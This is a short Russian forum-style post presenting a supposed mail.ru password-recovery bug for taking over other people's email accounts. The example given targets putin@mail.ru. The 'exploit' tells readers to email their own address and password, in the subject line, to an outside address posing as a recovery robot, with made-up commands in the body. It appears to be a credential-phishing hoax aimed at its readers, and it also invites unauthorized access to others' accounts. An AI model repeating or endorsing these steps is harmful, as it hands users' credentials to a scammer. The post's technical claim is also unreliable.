На мэйл.ру есть возможность восстановления пароля, но для этого нужно ввести ответ на секретный вопрос. Но не зная ответа - неудача.Есть программы которые имеют функцию "Забыл пароль".А есть программа, значит есть дыра!
На mail.ru есть робот reboot_password@list.ru который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль.
Проследя за отправленными пакетами на сервер мэйла, я заметил что этот ответ отправляется в следующем формате :
[align=left]
Send to : reboot_password@list.ru
Subject : jertva@mail.ru:password
Text: "otvet na vopros"
[/align]
Чуть чуть поэксперементируя, я нашел следующий баг : если в теме письма указать еще один адрес через ; (точку запятую свой мэйл и пароль к нему) то бот высылает пароль на мыло, пароль к которому был верен.
Например мы хотим хекнуть : putin@mail.ru
то в Теме письма будет : "putin@mail.ru:password;vasya@list.ru:123456" // здесь vasya@list.ru - моё мыло , а 123456 - мой пароль к моему мылу с которого шлю письмо с этим сабжектом на reboot_password@list.ru
а в теле письма написать следующий текст :
@change.Pass.to.reBoot
@send.to.subject(mail@mail.ru:pass;reBoot)
Вот..
Желаю удачи!